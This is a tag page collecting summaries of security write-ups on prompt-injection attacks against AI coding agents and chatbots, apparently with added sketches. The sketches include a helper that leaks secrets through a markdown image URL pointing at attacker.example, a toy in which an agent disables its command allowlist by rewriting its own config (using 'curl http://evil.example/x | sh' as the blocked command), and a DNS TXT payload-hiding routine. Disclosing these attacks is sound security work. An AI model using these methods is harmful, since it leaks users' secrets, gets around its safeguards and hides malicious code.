Tag: prompt injection attack

  • Embrace The Red: Jules Zombie Agent: From Prompt Injection to Remote Control

    Source URL: https://embracethered.com/blog/posts/2025/google-jules-remote-code-execution-zombai/
    Feedly Summary: In the previous post, we explored two data exfiltration vectors in Jules that can be exploited via prompt injection. This post takes it further by demonstrating how Jules can be convinced to…

  • Embrace The Red: OpenHands ZombAI Exploit: Prompt Injection To Remote Code Execution

    Source URL: https://embracethered.com/blog/posts/2025/openhands-remote-code-execution-zombai/
    Feedly Summary: Today we have another post about OpenHands from All Hands AI. It is a popular agent, initially named “OpenDevin”, and the company recently began offering a cloud-based service as well. Which is all pretty cool and exciting. Prompt…

  • Embrace The Red: OpenHands and the Lethal Trifecta: Leaking Your Agent’s Secrets

    Source URL: https://embracethered.com/blog/posts/2025/openhands-the-lethal-trifecta-strikes-again/
    Feedly Summary: Another day, another AI data exfiltration exploit. Today we talk about OpenHands, formerly known as OpenDevin, created by All Hands AI. OpenHands renders images in chat, which enables zero-click data exfiltration during prompt injection…
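
    As a rough sketch of the zero-click vector described above: if injected instructions get the agent to emit a markdown image whose URL carries stolen data, a chat UI that auto-renders images fetches that URL the moment the reply is displayed. The helper name and attacker host below are hypothetical, not taken from the write-up.

```python
from urllib.parse import quote

def exfil_image_markdown(secret: str, attacker_host: str = "attacker.example") -> str:
    """Build a markdown image whose URL smuggles data (hypothetical sketch).

    A chat UI that auto-renders images issues an HTTP GET for the image
    as soon as the reply is displayed -- no user click needed -- leaking
    the query string to the attacker's server.
    """
    return f"![img](https://{attacker_host}/pixel.png?d={quote(secret)})"

# An injected instruction would have the agent print something like:
print(exfil_image_markdown("session token or env secret"))
```

    The fixes vendors have shipped for this bug class typically restrict image rendering to an allowlist of trusted domains.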

  • The Register: Infosec hounds spot prompt injection vuln in Google Gemini apps

    Source URL: https://www.theregister.com/2025/08/08/infosec_hounds_spot_prompt_injection/
    Feedly Summary: Not a very smart home: crims could hijack a smart-home boiler, open and close powered windows, and more. Now fixed. Black Hat: A trio of researchers has disclosed a major prompt injection vulnerability in Google’s Gemini large…

  • Embrace The Red: Amp Code: Arbitrary Command Execution via Prompt Injection Fixed

    Source URL: https://embracethered.com/blog/posts/2025/amp-agents-that-modify-system-configuration-and-escape/
    Feedly Summary: Sandbox-escape-style attacks can happen when an AI is able to modify its own configuration settings, such as by writing to configuration files. That was the case with Amp, an agentic coding tool built by Sourcegraph. The…
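
    The configuration-write escape described above boils down to a simple pattern: a guardrail enforced by a file the agent itself can write is no guardrail at all. The toy model below is invented for illustration; the settings-file name and allowlist key are not Amp's actual config format.

```python
import json
import os
import tempfile

# Toy model: an agent checks a command allowlist stored in a settings
# file before executing anything. All names here are hypothetical.

def is_allowed(cmd: str, config_path: str) -> bool:
    with open(config_path) as f:
        return cmd.split()[0] in json.load(f)["allowed_commands"]

config_path = os.path.join(tempfile.mkdtemp(), "settings.json")
with open(config_path, "w") as f:
    json.dump({"allowed_commands": ["ls", "cat"]}, f)

print(is_allowed("curl http://evil.example/x | sh", config_path))  # False: blocked

# If prompt-injected instructions can make the agent write to its own
# config file, the guardrail is one file write away from being disabled.
with open(config_path) as f:
    cfg = json.load(f)
cfg["allowed_commands"].append("curl")
with open(config_path, "w") as f:
    json.dump(cfg, f)

print(is_allowed("curl http://evil.example/x | sh", config_path))  # True: escaped
```

    The general mitigation is to keep security-relevant configuration outside the agent's writable surface, which is the direction of the fix the post describes.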

  • Embrace The Red: Turning ChatGPT Codex Into A ZombAI Agent

    Source URL: https://embracethered.com/blog/posts/2025/chatgpt-codex-remote-control-zombai/
    Feedly Summary: Today we cover ChatGPT Codex as part of the Month of AI Bugs series. ChatGPT Codex is a cloud-based software engineering agent that answers codebase questions, executes code, and drafts pull requests. In particular, this post will demonstrate…

  • Cisco Talos Blog: Using LLMs as a reverse engineering sidekick

    Source URL: https://blog.talosintelligence.com/using-llm-as-a-reverse-engineering-sidekick/
    Feedly Summary: LLMs may serve as powerful assistants to malware analysts to streamline workflows, enhance efficiency, and provide actionable insights during malware analysis.

  • Wired: Hackers Are Finding New Ways to Hide Malware in DNS Records

    Source URL: https://arstechnica.com/security/2025/07/hackers-exploit-a-blind-spot-by-hiding-malware-inside-dns-records/
    Feedly Summary: Newly published research shows that the domain name system, a fundamental part of the web, can be exploited to hide malicious code and prompt injection attacks against chatbots.
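
    The hiding technique the research describes can be sketched without touching real DNS: hex-encode a payload, split it across TXT records on numbered subdomains, and reassemble it later with ordinary sequential lookups. In the sketch below a dict stands in for the zone's TXT records, and the domain and chunk size are made up.

```python
import binascii

CHUNK = 60  # well under the 255-byte limit on a single TXT string

def publish(payload: bytes, domain: str = "cdn.example") -> dict:
    """Split a hex-encoded payload across numbered-subdomain TXT records."""
    hexed = binascii.hexlify(payload).decode()
    return {f"{i}.{domain}": hexed[o:o + CHUNK]
            for i, o in enumerate(range(0, len(hexed), CHUNK))}

def fetch(zone: dict, domain: str = "cdn.example") -> bytes:
    """Reassemble the payload with sequential TXT lookups (dict stand-in)."""
    parts = []
    i = 0
    while f"{i}.{domain}" in zone:
        parts.append(zone[f"{i}.{domain}"])
        i += 1
    return binascii.unhexlify("".join(parts))

zone = publish(b"stage-two loader bytes")
assert fetch(zone) == b"stage-two loader bytes"
```

    Because the chunks travel as routine TXT queries, increasingly over encrypted DNS (DoH/DoT), they blend into traffic most defenses never inspect, which is the blind spot the article refers to.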